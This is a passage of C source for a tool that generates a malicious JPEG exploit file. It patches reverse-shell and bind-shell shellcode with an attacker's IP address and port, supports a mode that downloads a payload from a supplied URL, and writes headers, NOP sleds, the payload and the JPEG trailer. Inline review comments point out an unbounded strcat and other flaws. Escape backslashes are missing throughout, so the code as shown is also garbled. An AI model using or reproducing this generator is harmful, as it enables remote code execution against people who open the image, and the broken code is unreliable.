// Walk the dotted quad one octet at a time.  For the two middle octets the
// strncpy count is a pointer difference that includes the following '.',
// which atoi() treats as the end of the number.  Each octet lands,
// XOR-encoded, at indices 179..182.

p1 = strchr(ip_addr, '.');

strncpy(str_num, ip_addr, p1 - ip_addr);

raw_num = atoi(str_num);

reverse_shellcode[179] = xor_data((char)raw_num);



p2 = strchr(p1+1, '.');

strncpy(str_num, ip_addr + (p1 - ip_addr) + 1, p2 - p1);

raw_num = atoi(str_num);

reverse_shellcode[180] = xor_data((char)raw_num);



p1 = strchr(p2+1, '.');

strncpy(str_num, ip_addr + (p2 - ip_addr) + 1, p1 - p2);

raw_num = atoi(str_num);

reverse_shellcode[181] = xor_data((char)raw_num);



// Last octet: up to 5 characters after the final '.'.

p2 = strrchr(ip_addr, '.');

strncpy(str_num, p2+1, 5);

raw_num = atoi(str_num);

reverse_shellcode[182] = xor_data((char)raw_num);

}



if (attack_mode == 2)

{

 // bind attack
 // Same patch scheme as the reverse payload at different offsets.

bind_shellcode[204] = (char) 0x90;

bind_shellcode[205] = (char) 0x92;

bind_shellcode[191] = xor_data((char)((encoded_port >> 16) & 0xff));

bind_shellcode[192] = xor_data((char)((encoded_port >> 24) & 0xff));

}





if (attack_mode == 4)

{



 // Http DL
 // Assumes the URL is argv[2] whatever the option order.
 // NOTE(review): unbounded strcat into the 2048-byte newshellcode buffer.

   

  strcpy(newshellcode,http_shellcode);

     strcat(newshellcode,argv[2]);

     strcat(newshellcode,"x01");

   

}

 

 // build the exploit jpeg



// Modes 1, 2 and 4 share the same front: three fixed sections, then 0x90
// padding up to file offset 0x63c.  sizeof counts each array's trailing NUL,
// hence the -3 here and the -1 in each loop bound.

if ( attack_mode != 3)

{

j = sizeof(header1) + sizeof(setNOPs1) + sizeof(header2) - 3;

   

for(i = 0; i < sizeof(header1) - 1; i++)

fputc(header1[i], fout);



for(i=0;i<sizeof(setNOPs1)-1;i++)

fputc(setNOPs1[i], fout);



for(i=0;i<sizeof(header2)-1;i++)

fputc(header2[i], fout);



for( i = j; i < 0x63c; i++)

fputc(0x90, fout);

j = i; // j now holds the offset reached (0x63c)

}



// Payload section.  After each loop i equals the number of payload bytes
// written, which the tail padding below adds to j.

if (attack_mode == 1)

{

for(i = 0; i < sizeof(reverse_shellcode) - 1; i++)

fputc(reverse_shellcode[i], fout);

}



else if (attack_mode == 2)

{

for(i = 0; i < sizeof(bind_shellcode) - 1; i++)

fputc(bind_shellcode[i], fout);

}



else if (attack_mode == 4)

{

// Writes all 2047 bytes of the buffer: the filled prefix plus its zeroed tail.

for(i = 0; i<sizeof(newshellcode) - 1; i++)

{fputc(newshellcode[i], fout);}



for(i = 0; i< sizeof(admin_shellcode) - 1; i++)

{fputc(admin_shellcode[i], fout);}

}



else if (attack_mode == 3)

{

// -a mode has its own layout: seven fixed sections, 1601 filler bytes,
// then the payload.  No offset bookkeeping is done for this mode.

 for(i = 0; i < sizeof(admin_header0) - 1; i++){fputc(admin_header0[i], fout);}

 

 for(i = 0; i < sizeof(admin_header1) - 1; i++){fputc(admin_header1[i], fout);}



 for(i = 0; i < sizeof(admin_header2) - 1; i++){fputc(admin_header2[i], fout);}

 

 for(i = 0; i < sizeof(admin_header3) - 1; i++){fputc(admin_header3[i], fout);}



 for(i = 0; i < sizeof(admin_header4) - 1; i++){fputc(admin_header4[i], fout);}



 for(i = 0; i < sizeof(admin_header5) - 1; i++){fputc(admin_header5[i], fout);}

 

 for(i = 0; i < sizeof(admin_header6) - 1; i++){fputc(admin_header6[i], fout);}

 

 // NOTE(review): as shown, 'x41' is a multi-character constant, not one byte.

 for (i = 0; i<1601; i++){fputc('x41', fout);}



 for(i = 0; i < sizeof(admin_shellcode) - 1; i++){fputc(admin_shellcode[i], fout);}





}



// Tail for modes 1, 2 and 4: i + j is the current file offset.  Pad with
// 0x90 until setNOPs2 fits below 0x1000, then write it, never past 0x1000.

if (attack_mode != 3 )

{

for(i = i + j; i < 0x1000 - sizeof(setNOPs2) + 1; i++)

fputc(0x90, fout);



for( j = 0; i < 0x1000 && j < sizeof(setNOPs2) - 1; i++, j++)

fputc(setNOPs2[j], fout);

     

}



// Trailer bytes, written through fprintf (no format directives in the literal).

fprintf(fout, "xFFxD9");





// fcloseall() is a CRT extension, not standard C: it closes every open
// stream, fout included; its return value is ignored here.

fcloseall();



WSACleanup();



printf(" Exploit JPEG file %s has been generated!n", jpeg_filename);



return(EXIT_SUCCESS);

}  
